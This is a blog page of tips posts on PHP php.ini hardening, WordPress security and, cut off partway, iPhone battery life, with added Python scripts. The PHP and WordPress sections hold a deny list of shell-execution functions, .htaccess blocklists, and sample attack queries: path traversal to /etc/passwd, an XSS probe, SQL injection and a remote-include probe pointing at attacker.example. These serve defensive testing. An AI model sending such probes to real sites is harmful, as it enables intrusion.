Tips Category

PHP Hardening & Security

Posted on 11 Dec 2014 In: Blog, Tips

Hardening Patch for PHP – The Suhosin Hardening-Patch for PHP provides low-level protections that cannot be implemented in an extension: protection against vulnerabilities in the Zend engine and the PHP core itself, such as buffer overflows and format string vulnerabilities. Consequently, the patch is PHP version-specific.

Suhosin Extension – The Suhosin Extension contains the bulk of Suhosin's protection features. Its focus is to protect against code-level vulnerabilities and hacker tricks. It is not PHP version-specific. From PHP 5.4 onwards Suhosin is available as an extension and can be downloaded here.

Hardening PHP Applications

Read here to learn more about security measures for PHP applications.

Hardening PHP from php.ini

PHP's default configuration file, php.ini (usually found in /etc/php.ini on most Linux systems), contains a host of functionality that can be used to help secure your web applications. Unfortunately many PHP users and administrators are unfamiliar with the various options available in php.ini and leave the file in its stock configuration. By utilizing a few of the security-related options in the configuration file you can greatly strengthen the security posture of web applications running on your server.

Safe Mode

PHP safe mode is a comprehensive "attempt to solve the shared server security problem" that includes many useful features. Note that safe mode support is being removed in PHP 6. Safe mode effectively checks that the files a script touches on the server share the script's ownership. For instance, suppose a page script1.php attempts to read the contents of a directory img/. Safe mode will check the UID of script1.php against that of the img/ directory: if they match, the script is allowed access; if they don't, safe mode denies it. This is an interesting security mechanism that lets you restrict access by scripts outside of the normal application installation directory. Safe mode may cause problems, though, when the web server ends up owning files (for instance, a file uploaded or created by an application is usually owned by 'apache' or a similar web server account).

Safe mode will also restrict the executables that scripts may run, in the same way it restricts file and directory access. Safe mode can also be configured so that only executables in a certain directory can be run. This can help limit the exposure of shell commands to certain scripts.

To enable safe mode, alter (or add) the safe mode directive in php.ini to:

safe_mode = On

In some cases you'll want to check ownership by group (for instance when multiple people deploy web application scripts). To have safe mode check group permissions use:

safe_mode_gid = On

If you want to limit the directories that can contain included files or executables, use the following php.ini directives respectively:

safe_mode_include_dir = /path/to/dir
safe_mode_exec_dir = /path/to/exec/dir

Safe mode has several other useful features that are worth looking into. Browse the documentation at the PHP website and see if safe mode is right for your environment.

Restricting Includes

Using the open_basedir directive in PHP makes a lot of sense given how most file inclusion vulnerabilities are exploited. This directive limits all PHP file operations to the listed directory and below. It is common for attackers to search for ways to include local files in PHP scripts in order to expose local filesystem files through the web server. For instance, if an attacker found a file inclusion vulnerability they might try to include the /etc/passwd file to enumerate all the user accounts on the system. With the open_basedir directive PHP can restrict file access to the web root, for instance /var/www. Once set, files outside that directory cannot be included in scripts, and thus the aforementioned attack would fail. To enable the open_basedir directive, update your php.ini file to include:

open_basedir = /path/to/web/root

Disabling Functionality

There are certain functions in PHP that you probably don't want your developers to use because of the danger they pose. Even if you know your users aren't utilizing certain functions, it is wise to disable them completely so an attacker can't use them either. This precaution is especially effective at stopping an attacker who has somehow managed to upload a PHP script, write one to the filesystem, or include a remote PHP file. By disabling functionality you limit the effectiveness of these types of attacks. It should be noted that disabling functions cannot reliably prevent an attacker from executing a command at a shell, but it can certainly stop an attacker who isn't a skillful PHP programmer.

By disabling functions like shell_exec() and system() you prevent users and attackers from utilizing them. It is important to restrict this functionality for developers because the use of these commands opens the potential for a remote code execution vulnerability if they are not utilized with great care. There are certainly legitimate cases for operations such as executing a command at a shell, but PHP provides a host of functions that are essentially the same. Developers can standardize on one such function and the rest can be disabled to help prevent attacks. While this isn't a foolproof solution it will probably prevent attacks like the dreaded c99 shell. To enable the disable_functions directive simply add it to your php.ini with a comma-separated list of the functions you want to restrict. For instance:

disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo

Preventing Information Disclosure

Attackers will often use information that your web server exposes to learn about the server configuration, application layout, and components. Error messages are one of the most common paths to information disclosure, often leaking details such as the application installation path, database connectivity, data model details such as table and column names, and script details such as variable names. While this debugging information is invaluable to developers, it is useless to end users and dangerous to expose to attackers. PHP debugging output should be disabled in php.ini using:

display_errors = Off

This prevents PHP from showing run-time errors in pages served to users. PHP will continue to log the errors as normal, however, so they can be reviewed by developers. Be wary of developer tactics to get around this, however, as disabling the display of errors does not by itself prevent information disclosure. Some developers may use custom debugging output nested in HTML comments, third-party tools like FirePHP, or write PHP error logs to local directories using .htaccess files and the error_log directive. Nevertheless, by preventing the display of errors by default you reduce the possibility of exposing information to attackers.

Disable Globals

Global variables are a horrible holdover from the PHP 3 days. In most distributions register_globals is set to Off (and thankfully it won't be supported in future versions of PHP). However, you should ensure that the directive is properly in place. You should find the following in your php.ini file:

register_globals = Off

Register globals allows various HTTP variables to be used without specifying their source. For instance, if a developer wants to use a URL variable named 'id', say from the request index.php?id=4, with register_globals they can simply use $id rather than $_GET['id']. This is a great convenience but it can cause collisions. For instance, if a form post uses a variable called 'id', there is a variable $id defined in the script, and a user alters the URL of the script to include 'id=', which variable takes precedence? Even more damaging is the ability of attackers to override configuration variables such as DOCUMENT_ROOT from the URL. This can cause no end of problems, especially if attackers are able to call scripts that are normally included by other scripts and expect predefined variables, which an attacker could overwrite via GET variables.

Many legacy applications may require globally registered variables. If this is the case, at least limit the configuration to specific application directories rather than your whole PHP installation. You can do this using PHP directives in .htaccess files placed in specific directories. Ensure that register_globals is set to Off in your php.ini configuration, however!

Disable Remote File Includes

Attackers will often attempt to identify file inclusion vulnerabilities in applications and then use them to include malicious PHP scripts that they have written. Even if an attacker doesn't have write access to the web application directories, if remote file inclusion is enabled the attacker can host malicious PHP scripts on another server and the web application will fetch and execute them locally! This can have devastating consequences. To restrict remote file inclusion be sure the following appears in your php.ini file:

allow_url_fopen = Off
allow_url_include = Off

This prevents remote scripts from being included and executed by scripts on your system.

Restrict File Uploads

If you're not utilizing file upload functionality in any of your PHP scripts then it's a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. Disabling file uploads altogether makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:

file_uploads = Off

Even if you do allow file uploads you should change the default temporary directory used for them. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration concern than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict the upload directory and file size change your php.ini so that it reads:

upload_tmp_dir = /var/php_tmp
upload_max_filesize = 2M

Protect Sessions

Session stealing is a popular attack that allows a malicious user to hijack the session of a legitimate user. Using session hijacking an attacker can bypass authentication and access portions of web applications without authorization. PHP uses strong (meaning long, pseudo-randomly generated) session identifiers so that guessing a session id is extremely difficult. When logging into a PHP application you can view your cookies and will likely find one with a name like 'PHPSESSID' and a value similar to 'bbbca6bb7a23bdc8de3baef2b506e654'. The value is composed of 32 hexadecimal characters, making it extremely hard to predict. The weakness in this system, however, is that session data is written to the filesystem when a session is created so PHP can keep track of it. Changing the default location of these session files will confound some attempts to read them. To change the location where session information is written, alter session.save_path in the php.ini configuration so that it points to your desired location, like so:

session.save_path = /var/lib/php

Make sure that the web server can read and write to the location you specify, however, or sessions won't work. You may also wish to configure PHP so that it writes cookies in such a way that they are inaccessible to JavaScript. If you don't have any PHP applications that use JavaScript to manipulate cookies this is a great idea. Attackers will often exploit Cross Site Scripting (XSS) flaws in web applications to inject JavaScript into pages, which could be used to steal session cookies. By setting the php.ini directive:

session.cookie_httponly = 1

you prevent JavaScript from accessing your cookies. Another small security feature is allowing PHP to check HTTP Referer values so that session information is only accepted while a user is navigating within the application. This prevents users from accidentally publishing session information in a way that would allow external users to follow links and steal a session. This is especially useful if session information is being passed in a URL that could accidentally be published to a mailing list or web site. To enable this functionality use the following in your php.ini:

session.referer_check = your_url.tld

For more information about session security see http://devzone.zend.com/manual/ref.session.html.
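The directives in this section can be checked mechanically rather than by eye. The following Python script is an added example (not part of the original article): it reads a php.ini, applies the recommendations made above, and lists every directive that is still in its weak state. The sample php.ini, the check table and the built-in defaults assumed for directives that are absent from the file are this example's own; safe_mode is left out because current PHP no longer has it.

```python
"""Audit a php.ini for the hardening directives discussed in this section."""
from typing import Dict, List, Optional

# Constructed sample for this example: a production php.ini with a few development leftovers.
SAMPLE_PHP_INI = """\
[PHP]
engine = On
display_errors = On              ; left over from development
log_errors = On
register_globals = Off
allow_url_fopen = On
;allow_url_include = Off         ; commented out, so the built-in default applies
file_uploads = On
upload_tmp_dir = /var/php_tmp
upload_max_filesize = 2M
disable_functions = phpinfo, exec, system
open_basedir = "/var/www:/tmp"

[Session]
session.save_path = "/var/lib/php"
session.cookie_httponly = 0
"""

# Values PHP treats as true in a boolean ini directive.
TRUE_WORDS = {"1", "on", "true", "yes"}

# Directives the text above wants Off, with PHP's built-in default for when the
# directive is absent from the file (assumed here from the PHP documentation).
MUST_BE_OFF = {
    "display_errors": "1",
    "register_globals": "0",
    "allow_url_fopen": "1",
    "allow_url_include": "0",
    "file_uploads": "1",
}
MUST_BE_ON = {"session.cookie_httponly": "0"}

# The command-execution functions singled out above for disable_functions.
EXEC_FUNCTIONS = {"exec", "system", "shell_exec", "passthru", "proc_open"}


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: skips comments and [sections], strips inline
    comments and surrounding quotes; later duplicates win, as in PHP.
    (Quoted values that themselves contain ';' are not handled.)"""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "[")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        value = value.split(";", 1)[0].strip()
        settings[key.strip().lower()] = value.strip("\"'")
    return settings


def ini_bool(value: Optional[str]) -> bool:
    """Interpret a directive value the way PHP does for boolean settings."""
    return value is not None and value.strip().lower() in TRUE_WORDS


def audit_php_ini(text: str) -> List[str]:
    """Return one finding per directive that deviates from the hardened value."""
    cfg = parse_php_ini(text)
    findings: List[str] = []
    for name, default in MUST_BE_OFF.items():
        if ini_bool(cfg.get(name, default)):
            findings.append(f"{name} is On (expected Off)")
    for name, default in MUST_BE_ON.items():
        if not ini_bool(cfg.get(name, default)):
            findings.append(f"{name} is Off (expected On)")
    if not cfg.get("open_basedir"):
        findings.append("open_basedir is unset (file operations not confined to the web root)")
    disabled = {f.strip().lower() for f in cfg.get("disable_functions", "").split(",") if f.strip()}
    still_enabled = sorted(EXEC_FUNCTIONS - disabled)
    if still_enabled:
        findings.append("disable_functions still allows: " + ", ".join(still_enabled))
    return findings


if __name__ == "__main__":
    for finding in audit_php_ini(SAMPLE_PHP_INI):
        print("-", finding)
```

Run it against /etc/php.ini (or the output of php --ini) after each change, and remember that a directive set in a per-directory .htaccess or php-fpm pool can override what the main file says.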


Conclusions

Implementing these security features within your PHP configuration isn't a recipe for complete security, but it does improve the overall security posture of your web applications. By combining these measures with others, such as Suhosin and an intrusion detection system like OSSEC, you incrementally increase the security of your server and web applications. You must be careful to implement configurations that restrict functionality that could be used to the detriment of your installation, without restricting developers. Frustrating developers is a surefire recipe for home-grown solutions that circumvent your restrictions, and invariably these solutions weaken the overall security of your server and often introduce vulnerabilities. Take care to harden your servers as much as possible, but don't become overzealous. Beginning the process of server hardening with your php.ini configuration is a great first step as it affects all the PHP web applications installed on the server and can be applied incrementally. Remember to restart your web server after making changes to the php.ini file so that those changes take effect.

Source: http://www.madirish.net/199

WordPress Security Tutorial

Posted on 11 Dec 2014 In: Blog, Tips

I have been revisiting the various security settings of my WordPress blog after the sudden database table corruption of this blog for an unknown reason last week. In this post I have highlighted some of the security tips that can help protect your blog from possible outside attacks.


Protect your WordPress Admin Area

It is important to restrict access to your WordPress admin area to only the people that actually need it. If your site does not support registration or front-end content creation, your visitors should not be able to access your /wp-admin/ folder or the wp-login.php file. The best you can do is to get your home IP address (you can use a site like whatismyip.com for that) and add these lines to the .htaccess file in your WordPress admin folder, replacing xx.xxx.xxx.xxx with your IP address.

# Apache 2.2 access-control syntax; on Apache 2.4 these directives need
# mod_access_compat (the native 2.4 equivalent is "Require ip ...").
<Files wp-login.php>
order deny,allow
Deny from all
Allow from xx.xxx.xxx.xxx
</Files>

In case you want to allow access to multiple computers (like your office, home PC, laptop, etc.), simply add another Allow from xx.xxx.xxx.xxx statement on a new line.

If you want to be able to access your admin area from any IP address (for example, if you often rely on free Wi-Fi networks), restricting your admin area to a single IP address or to a few IPs can be inconvenient. In such cases we recommend that you limit the number of incorrect login attempts to your site. This way you will protect your WordPress site from brute-force attacks and people trying to guess your password. For such purposes, you can use a nice little plugin called Limit Login Attempts.

Don’t use the “admin” username

Most of the attackers will assume that your admin username is “admin”. You can easily block a lot of brute-force and other attacks simply by naming your admin username differently. If you’re installing a new WordPress site, you will be asked for username during the WordPress installation process. If you already have a WordPress site, you can follow the instructions in our tutorial on how to change your WordPress username.

Use strong passwords

You will be surprised to know that there are thousands of people who use phrases like "password" or "123456" for their admin login details. Needless to say, such passwords can be easily guessed and they are at the top of the list of any dictionary attack. A good tip is to use an entire sentence that makes sense to you and that you can remember easily. Such passwords are much, much better than single-word ones.

Consider two-factor authentication

Enabling two-factor authentication for your WordPress website will significantly improve the security of your website. One of the easiest ways to do this is to use Google 2 factor authentication or Clef to authenticate using your mobile phone. For all SiteGround users, Clef authors have created an ad-free version of their plugin. Check out our Clef tutorial for more information on that matter.

Make sure your site is on secure WordPress hosting

Your WordPress site is only as secure as your hosting account. If someone can exploit a vulnerability in an old PHP version, for example, or in another service on your hosting platform, it won't matter that you have the latest WordPress version. This is why it is important to be hosted with a company that treats security as a priority. Some of the features that you should look for are:

  • Support for the latest PHP and MySQL versions
  • Account isolation
  • Web Application Firewall
  • Intrusion detection system

Ensure your computer is free of viruses and malware

If your computer is infected with a virus or malware, a potential attacker can gain access to your login details and make a valid login to your site, bypassing all the measures you've taken before. This is why it is very important to have an up-to-date antivirus program and to keep the overall security of all computers you use to access your WordPress site at a high level.

Use Strong Passwords for all Entry Points

I was surprised to find out how many of my friends use the WordPress admin password generated by WordPress during install time and think that their blog is protected from attacks as they are using a strong password! The WordPress admin password generated during install time is normally pretty strong (it consists of lowercase and uppercase letters with numbers and symbols) so there is nothing wrong with that. I was mainly shocked to find out that their FTP/cPanel password for that domain is not that strong. It gets even better… one of them was using his partner's name as the password (did I mention that his partner's name was mentioned on his blog's 'About' page?)! The FTP/cPanel password for your domain is equally important. If someone can access your cPanel then that person can delete your WordPress database from cPanel->Databases->MySQL Databases. Anyway, the bottom line is to use strong passwords for all entry points, not just one.

Add a CAPTCHA on your WordPress Login page

Adding a simple CAPTCHA to your WordPress login page is another great way to minimize the chance of a bot/script gaining access to your site via a brute force attack. It's recommended to add Google's reCAPTCHA for WP: https://www.google.com/recaptcha/intro/index.html

Protect the ‘wp-admin’ Directory

Use a .htaccess file in the 'wp-admin' directory to limit access to only certain IP addresses (your home, work etc.). The WordPress htaccess tips post has more htaccess-related tips and tricks. Below is an example .htaccess file that can be used for this purpose (replace the 'x' and 'y' addresses with your own IP addresses):

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
order deny,allow
deny from all
# whitelist home IP address
allow from xxx.xxx.xxx.xxx
# whitelist work IP address
allow from yy.yyy.yyy.yyy

If you don't have static IP addresses then the above method can be a bit hard to implement. In that case you could use the AskApache Password Protect WordPress plugin, which adds good password protection to your WordPress blog. Use the Login Lockdown feature of the All In One WP Security plugin to protect your blog against brute force attacks (a brute force attack is a method of defeating a cryptographic scheme by systematically trying a large number of possibilities).

Deny access to your Plugins and other directories

A lot of bloggers don't protect access to their WordPress plugins directory. What I mean by this is that if you go to www.your-domain.com/wp-content/plugins/ in a browser it lists all the plugins that you are using. Many WordPress plugins can have vulnerabilities which an attacker can use to harm your blog, so it's a good idea to block access to these directories. You can use a .htaccess file or just upload a blank 'index.html' file to the directory to block the listing. (download a blank index.html)

Update WordPress to the Latest Release

As new WordPress versions are released, the security bugs of the previous release become public information. WordPress could have vulnerabilities, as a result of how the program is written, that allow an attacker to pass HTTP arguments, bad URI strings, form input, etc., that could cause Bad Things to happen. So always update your WordPress to the latest version to make sure that you are protected against any known security bugs.

Don’t Show WordPress Version on Your Blog

You should not make the WordPress version that you are using visible to others for the same reason explained above. The specific WordPress version that you are using can give the attacker an upper hand in finding a way to break in.

Backup Your Data

I can’t stress this enough… always keep backups of all the important files. I always backup my WordPress Database and WordPress files in case of emergency. Read my what would you do if you lost all your blog’s content article to find out how backups can help you sleep better at night :)

Be careful when you upload something to your site

When you upload a script (for example a plugin, a theme or just a normal script) to your site you need to be extra careful, as it can harm your site if it was designed to do so. Only upload authentic content to your site. Never download a plugin or a theme from warez, torrent or file-sharing sites. The content on these sites can be disguised as a plugin or a theme but it will harm your site when uploaded to your server. You can read more on these types of attack in the free premium plugin and theme downloaders beware article.

Advanced WordPress Security Tips

However, if you are in the mood for some advanced tweaking then the following security tips should come in handy ;)

NOTE and DISCLAIMER

Most of these techniques require you to understand what you are doing.

It is strongly recommended that you first test these techniques on a test or development site before applying them to your live site. Doing some of the tips suggested here can break your site if not performed correctly.

We take no responsibility for any mishaps as a result of your efforts in applying the techniques discussed in this article.

Also note that these techniques assume that your WordPress installation is running Apache and you have mod_alias and mod_rewrite installed.

1. Disable HTTP Trace Method

There is a security attack technique called Cross Site Tracing (XST) which can be used together with another attack mechanism called Cross Site Scripting (XSS); it exploits systems which have HTTP TRACE functionality enabled. HTTP TRACE is enabled by default on most web servers and is used for things like debugging. Hackers who use XST will usually steal cookies and other sensitive server information via header requests.

You can disable the trace functionality either via your Apache configuration file or by putting the following in your .htaccess file:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

2. Remove header outputs from your WordPress installation

WordPress can often add quite a lot of output in your header pertaining to various services. The following code shows how you can remove a lot of this output.

Warning: this can break some functionality if you are not careful. E.g., if you're using RSS feeds then you may want to comment that line out.

Add the following code to your theme’s functions.php file:

remove_action('wp_head', 'index_rel_link');
remove_action('wp_head', 'feed_links', 2);
remove_action('wp_head', 'feed_links_extra', 3);
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wlwmanifest_link');
remove_action('wp_head', 'parent_post_rel_link', 10, 0);
remove_action('wp_head', 'start_post_rel_link', 10, 0);
remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0);
remove_action('wp_head', 'wp_generator');
remove_action('wp_head', 'wp_shortlink_wp_head', 10, 0);
remove_action('wp_head', 'noindex', 1);

3. Deny comment posting via proxy server

You can reduce spam and general proxy requests by attempting to prevent comments which are posted via a proxy server. Use the code below (compliments of perishablepress.com) in your .htaccess file:

RewriteCond %{REQUEST_METHOD} =POST
RewriteCond %{HTTP:VIA}%{HTTP:FORWARDED}%{HTTP:USERAGENT_VIA}%{HTTP:X_FORWARDED_FOR}%{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}%{HTTP:HTTP_PC_REMOTE_ADDR}%{HTTP:HTTP_CLIENT_IP} !^$
RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
RewriteRule .* - [F,NS,L]

4. Change your default WordPress DB prefix

You may already be aware that WP uses a default prefix value of “wp_” for the DB tables. This can in turn be used by malicious bots and hackers to guess your DB table names.

In general, changing your WP DB prefix value is much easier to do at installation time because you can set it in your wp-config.php file.

Conversely if you already have a live WP site and you wish to change your DB prefix, then the procedure is a little more complicated.

A basic guide for changing the DB prefix after an install for those who are curious is briefly outlined below:

1) Do a full DB backup and save the backup somewhere off-site. Using something like BackupBuddy can be useful.
2) Do a complete dump of your WP DB using phpMyAdmin into a text file and save 2 copies – one for editing and the other as an original, just in case.
3) Using a good code editor, replace all instances of "wp_" with your own prefix.
4) From your WP admin panel, deactivate all plugins.
5) Using phpMyAdmin, drop your old DB and import your new one using the file you edited in step 3.
6) Edit your wp-config.php file with the new DB prefix value.
7) Re-activate your WP plugins.
8) Save your permalink settings again by going to Settings->Permalinks in order to refresh your permalink structure.

Caution:

Sometimes plugins add their own prefix after the WordPress prefix, and the two can be identical.

For example, a table belonging to a certain plugin might have a name like the following: wp_wp_abc_table_name.

Be sure when replacing the "wp_" instances in step 2 above that you only replace the first "wp_" prefix and not the one following it.
For instance, if we take the example just mentioned we would replace only the first prefix with our new prefix, which for this example might be "trx_".

The new name would look like:

trx_wp_abc_table_name

Note that there are also WP plugins out there which can achieve the above steps for those who are not prepared to get their hands dirty.
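The caution above (keep the second "wp_" of a table such as wp_wp_abc_table_name) is easy to get wrong with a blind search-and-replace in an editor. As an added example that is not part of the original tutorial, the Python function below rewrites the prefix in a SQL dump by anchoring on the backtick that phpMyAdmin puts around identifiers, so only the leading prefix changes. It also goes beyond the steps above by renaming the prefix-dependent values WordPress stores as data (wp_user_roles in the options table, wp_capabilities and wp_user_level in usermeta), which a table-name-only replacement would miss and which break logins after the import. The dump fragment is constructed for this example.

```python
"""Rename the WordPress table prefix in a SQL dump without touching the second 'wp_'."""
import re
from typing import List

# Constructed fragment in the style of a phpMyAdmin export (not a real database).
SAMPLE_DUMP = """\
DROP TABLE IF EXISTS `wp_posts`;
CREATE TABLE `wp_posts` (`ID` bigint(20) NOT NULL, `post_content` longtext);
CREATE TABLE `wp_wp_abc_table_name` (`id` int NOT NULL);
INSERT INTO `wp_options` (`option_name`, `option_value`) VALUES ('wp_user_roles', 'a:0:{}');
INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (1, 'wp_capabilities', 'a:0:{}');
INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (1, 'wp_user_level', '10');
INSERT INTO `wp_posts` (`ID`, `post_content`) VALUES (7, 'Try SHOW TABLES LIKE wp_% in mysql');
"""

# Option names and meta keys that WordPress builds from the table prefix.
PREFIXED_DATA_KEYS = ("user_roles", "capabilities", "user_level")


def rewrite_prefix(dump: str, old: str = "wp_", new: str = "trx_") -> str:
    """Rewrite table identifiers and prefix-dependent data keys from `old` to `new`."""
    # Identifiers are backtick-quoted in the dump, so matching "`wp_" rewrites only
    # the leading prefix: `wp_wp_abc_table_name` becomes `trx_wp_abc_table_name`,
    # while "wp_" appearing inside ordinary post content is left alone.
    out = dump.replace("`" + old, "`" + new)
    # The prefix-dependent keys are stored as single-quoted string literals.
    for suffix in PREFIXED_DATA_KEYS:
        out = out.replace(f"'{old}{suffix}'", f"'{new}{suffix}'")
    return out


def table_names(dump: str) -> List[str]:
    """List the tables a dump creates, to check the result before importing it."""
    return re.findall(r"CREATE TABLE `([^`]+)`", dump)


if __name__ == "__main__":
    rewritten = rewrite_prefix(SAMPLE_DUMP)
    print("\n".join(table_names(rewritten)))
```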

5. Deny Potentially Dangerous Query Strings

You can put the following code in your .htaccess file to help prevent XSS attacks.

BEWARE: Functionality of some plugins or themes could break if you are not careful to exclude strings which are used by them.

# QUERY STRING EXPLOITS
# Each RewriteCond is a PCRE pattern matched against the raw query string;
# backslashes escape literal dots and other regex metacharacters.
<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag= [NC,OR]
RewriteCond %{QUERY_STRING} ftp: [NC,OR]
RewriteCond %{QUERY_STRING} http: [NC,OR]
RewriteCond %{QUERY_STRING} https: [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|'|"|;|\?|\*).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%22|%27|%3C|%3E|%5C|%7B|%7C).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|config|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
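The BEWARE above is worth quantifying before the rules go live: replay them against traffic you know is legitimate and see what they would reject. As an added example (not from the original post), the Python script below compiles the same patterns as the .htaccess block above the way mod_rewrite evaluates them (case-insensitive, against the raw URL-encoded query string, any match blocking) and runs them over constructed sample requests to separate blocked probes from blocked legitimate requests.

```python
"""Replay the query-string blocklist above against sample requests."""
import re
from typing import List, Optional, Tuple

# The RewriteCond patterns from the .htaccess block above. [NC] makes them
# case-insensitive, and mod_rewrite tests them against the raw, still
# URL-encoded query string; any single match triggers the [F] rule.
QUERY_STRING_RULES = [
    r"\.\./",
    r"boot\.ini",
    r"tag=",
    r"ftp:",
    r"http:",
    r"https:",
    r"mosConfig",
    r'''^.*(\[|\]|\(|\)|<|>|'|"|;|\?|\*).*''',
    r"^.*(%22|%27|%3C|%3E|%5C|%7B|%7C).*",
    r"^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).*",
    r"^.*(globals|encode|config|localhost|loopback).*",
    r"^.*(request|select|insert|union|declare|drop).*",
]
COMPILED = [re.compile(p, re.IGNORECASE) for p in QUERY_STRING_RULES]

# Constructed sample traffic: (query string, True if the site needs this request to work).
SAMPLE_REQUESTS: List[Tuple[str, bool]] = [
    ("p=123", True),
    ("tag=security", True),                        # WordPress tag archive without pretty permalinks
    ("s=select+a+theme", True),                    # an ordinary site search
    ("s=how+to+configure+backups", True),          # "config" hides inside "configure"
    ("redirect_to=http%3A%2F%2Fexample.test%2Fwp-admin%2F", True),  # wp-login redirect
    ("file=../../etc/passwd", False),              # directory traversal probe
    ("q=%3Cscript%3Ealert(1)%3C%2Fscript%3E", False),  # reflected XSS probe
    ("id=1+union+select+user_login+from+wp_users", False),  # SQL injection probe
    ("page=http://attacker.example/shell.txt", False),  # remote file inclusion probe
]


def blocked_by(query_string: str) -> Optional[str]:
    """Return the first pattern that matches (the request would get a 403), or None."""
    for pattern, rx in zip(QUERY_STRING_RULES, COMPILED):
        if rx.search(query_string):
            return pattern
    return None


def evaluate(requests: List[Tuple[str, bool]] = SAMPLE_REQUESTS) -> Tuple[List[str], List[str]]:
    """Split the samples into false positives (legitimate but blocked) and misses (hostile but allowed)."""
    false_positives = [q for q, legit in requests if legit and blocked_by(q)]
    misses = [q for q, legit in requests if not legit and not blocked_by(q)]
    return false_positives, misses


if __name__ == "__main__":
    fps, misses = evaluate()
    print("legitimate requests the rules would block:")
    for q in fps:
        print(f"  ?{q}  (rule: {blocked_by(q)})")
    print("hostile samples the rules let through:", misses or "none")
```

Feed it the query strings from your own access log in place of SAMPLE_REQUESTS; every legitimate hit in the first list is a rule you need to loosen or exclude before enabling the block.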

6. Apply PHP hardening to your system

You can install and enable Suhosin, a PHP hardening system, on your server. This can further increase the security of your system by protecting against various vulnerabilities.

Suhosin typically installs on most PHP setups and is sometimes included by web hosting companies by default (check with your hosting provider).

You can read more about Suhosin here.

Further reading: http://codex.wordpress.org/Hardening_WordPress

Source:

https://www.tipsandtricks-hq.com/advanced-wordpress-security-tips-4659
https://www.tipsandtricks-hq.com/essential-wordpress-security-tips-is-your-blog-protected-987


22 Tips to Extend iPhone Battery Life

Posted on 24 Oct 2014 In: Blog, Tips

Anyone who’s used an iPhone for even a few days has discovered that while these phones are more powerful, and more fun, than perhaps any other cell or smart phone, that fun comes with a price: battery use. Any halfway intensive iPhone user will recharge their phone almost every couple of days.

There are ways to conserve iPhone battery life, but many of them involve turning off services and features, which makes it a choice between all the cool things that the iPhone can do and having enough juice to do them.

Here are 20 tips to help you extend your iPhone’s power, including new tips for iOS 8, which has features that can drain battery faster than earlier versions.

You don’t need to follow all of them (what fun would that be?)—just use the ones that make sense for how you use your iPhone—but following some will help you conserve juice.


1. Turn on Auto-Brightness

The iPhone has an ambient light sensor that adjusts the brightness of the screen based on the light around it (darker in dark places, brighter when there's more ambient light) to both save battery and make it easier to see. Turn Auto-Brightness on and you'll save energy because your screen will need less power in dark places.

Adjust that setting by tapping:

  1. The Settings app
  2. Display & Brightness (it’s called Brightness & Wallpaper in iOS 7)
  3. Move the Auto-Brightness slider to On/green

2. Reduce Screen Brightness

You can control the default brightness of your iPhone screen with this slider. Needless to say, the brighter the default setting for the screen, the more power it requires. Keep the screen dimmer to conserve more of your battery by tapping:

  1. The Settings app
  2. Display & Brightness (it’s called Brightness & Wallpaper in iOS 7)
  3. Move the slider as needed

3. Stop Motion & Animations (iOS 7)

One of the coolest features of iOS 7 is called Background Motion. It’s subtle, but if you move your iPhone and watch the app icons and background image, you’ll see them move slightly independently of each other, as if they’re on different planes. This is called a parallax effect. It’s really cool, but it also drains battery. You may want to leave it on to enjoy the effect, but if not, turn it off by tapping:

  1. The Settings app
  2. General
  3. Accessibility
  4. Reduce Motion
  5. Move slider to green/On

4. Disable Dynamic Backgrounds (iOS 7)

Another neat feature introduced in iOS 7 is animated wallpapers that move underneath your app icons. These dynamic backgrounds offer a cool interface flourish, but they also use more power than a simple static background image. Dynamic Backgrounds aren’t a feature you have to turn on or off; just don’t select a Dynamic Background in the Wallpapers & Backgrounds menu.

5. Turn Bluetooth Off

Bluetooth wireless networking is especially useful for cell phone users with wireless headsets or earpieces. But transmitting data wirelessly takes battery, and leaving Bluetooth on to accept incoming data at all times requires even more juice. Turn off Bluetooth except when you’re using it to squeeze more power from your battery.

Find it in:

  1. The Settings app
  2. Bluetooth
  3. Move slider to Off/white

